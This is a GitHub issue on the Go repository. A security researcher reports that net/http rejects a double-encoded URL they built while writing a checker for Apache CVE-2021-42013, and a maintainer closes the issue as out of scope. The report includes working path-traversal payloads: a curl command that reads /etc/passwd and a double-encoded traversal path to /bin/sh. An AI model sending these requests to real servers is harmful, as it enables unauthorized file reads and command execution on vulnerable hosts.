search

golang / go

The Go programming language
https://go.dev
BSD 3-Clause "New" or "Revised" License
123.83k stars 17.65k forks source link

net/http: http.NewRequest is error parse ... invalid URL escape "%%" #64866

Closed hktalent closed 10 months ago

hktalent commented 10 months ago

Go version

go version go1.21.4 darwin/amd64

What operating system and processor architecture are you using (go env)?

GO111MODULE='on'
GOARCH='amd64'
GOBIN=''
GOCACHE='/Users/51pwn/Library/Caches/go-build'
GOENV='/Users/51pwn/Library/Application Support/go/env'
GOEXE=''
GOEXPERIMENT=''
GOFLAGS=''
GOHOSTARCH='amd64'
GOHOSTOS='darwin'
GOINSECURE=''
GOMODCACHE='/Users/51pwn/go/pkg/mod'
GONOPROXY='github.com/hktalent/zbServer'
GONOSUMDB='github.com/hktalent/zbServer'
GOOS='darwin'
GOPATH='/Users/51pwn/go'
GOPRIVATE='github.com/hktalent/zbServer'
GOPROXY='https://mirrors.aliyun.com/goproxy/,direct'
GOROOT='/usr/local/go/'
GOSUMDB='sum.golang.org'
GOTMPDIR=''
GOTOOLCHAIN='auto'
GOTOOLDIR='/usr/local/go/pkg/tool/darwin_amd64'
GOVCS=''
GOVERSION='go1.21.4'
GCCGO='gccgo'
GOAMD64='v1'
AR='ar'
CC='clang'
CXX='clang++'
CGO_ENABLED='1'
GOMOD='/dev/null'
GOWORK=''
CGO_CFLAGS='-O2 -g'
CGO_CPPFLAGS=''
CGO_CXXFLAGS='-O2 -g'
CGO_FFLAGS='-O2 -g'
CGO_LDFLAGS='-O2 -g'
PKG_CONFIG='pkg-config'
GOGCCFLAGS='-fPIC -arch x86_64 -m64 -pthread -fno-caret-diagnostics -Qunused-arguments -fmessage-length=0 -ffile-prefix-map=/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/go-build3521013577=/tmp/go-build -gno-record-gcc-switches -fno-common'

What did you do?

I'm writing a verification program for this security vulnerability https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-42013 Try to do it with golang But curl is able to send packets like this correctly

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/ .%%32%65/.%%32%65/.%%32%65/etc/passwd

But it doesn’t work in golang. An error like this occurred.

http.NewRequest is error parse "https://api.xxx.com/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%% 32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/ sh": invalid URL escape "%%3"

I think that the task of parsing should be done by the server. Here the client only needs to send the data to the server.

Thank you very much for fixing this bug

What did you expect to see?

http.NewRequest is error parse "https://api.xxx.com/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%% 32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/ sh": invalid URL escape "%%3"

What did you see instead?

curl is ok

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/ .%%32%65/.%%32%65/.%%32%65/etc/passwd
seankhliao commented 10 months ago

our policy is that the client should only send valid data, use cases such as security scanners are considered out of scope.